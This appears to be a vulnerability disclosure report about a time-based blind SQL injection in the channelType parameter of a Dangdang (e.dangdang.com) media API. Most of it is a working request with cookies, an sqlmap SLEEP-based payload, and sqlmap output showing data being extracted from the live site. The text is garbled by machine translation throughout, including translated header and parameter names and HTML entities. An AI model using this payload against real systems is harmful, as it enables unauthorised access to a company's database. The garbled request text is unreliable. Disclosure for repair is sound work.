漏洞标题 当当变电站有SQL注入 相关制造商 当当网 漏洞作者 时Vinc 提交时间 2016-04-25 09: 38 公共时间 2016-06-09 11: 50 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 Sql注入 漏洞详细信息 GET包如下: GET /media/api.go?action=mediaRankingList&listType=sale&channelType=*&permanentId=20151109120332208112113523718686951&returnType=json&channelId=70000&clientVersionNo=5.0.0&deviceType=DDDS_ALL&start=0&end=19 HTTP/1.1 接受: */* Referer:http://e.dangdang.com/rank_detail_page.html X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML,与Gecko一样)Chrome/41.0.2228.0 Safari/537.21 Cookie: __permanent_id=20160423211433821241934195768855298; ddscreen=1; MDD_channelId=70000; MDD_fromPlatform=307; dest_area=COUNTRY_ID%3D9000%26province_id%3D173%26city_id%20%3D0%26district_id%3D0%26town_id%3D0 连接:保持活动状态 Accept-Encoding: gzip,deflate Accept-Language: zh-CN,en,* 主机: e.dangdang.com Pragma:无缓存 缓存控制:无缓存 参数:channelType 漏洞证明: Sqlmap从存储的会话:恢复以下注入点 --- 参数:#1 *(URI) 输入:和/或基于时间的盲 标题: MySQL>=5.0.12 AND基于时间的盲(SELECT) 有效载荷:http://e.dangdang.com: 80/media/api.go?action=mediaRankingList& list Ype=sale& channelType='AND(SELECT * FROM(SELECT(SLEEP(5)))HUfh)AND'aSqF'='a QF&安培; permanentId=20151109120332208112113523718686951&安培;返回类型=JSON&安培;的channelID=70 00安培; clientVersionNo=5.0.0&安培;设备类型=DDDS_ALL&安培;开始=0&安培;端=19 --- [09: 45: 07] [INFO]测试MySQL 您是否希望sqlmap尝试优化DBMS延迟响应的值(选项 '--time秒')? [Y/N] [09: 45: 14] [INFO]确认MySQL [09: 45: 14] [警告]不要强调网络适配器dur非常重要 从对等方接收数据时失败 [09: 47: 59] [ERROR]检测到无效字符。重试. [09: 47: 59] [警告]将时间延迟增加到3秒 一个 [09: 48: 05] [INFO]检索到:数字 [09: 49: 55] [INFO]检索到:数字 [09: 51: 46] [ERROR]检测到无效字符。重试. [09: 51: 46] [警告]将时间延迟增加到4秒 L_ [09: 53: 13] [ERROR]检测到无效字符。重试. [09: 53: 13] [警告]将时间延迟增加到5秒 搜索 [09: 55: 21] [INFO]检索到: dpp [09: 57: 30] [ERROR]检测到无效字符。重试. 从对等方接收数据时失败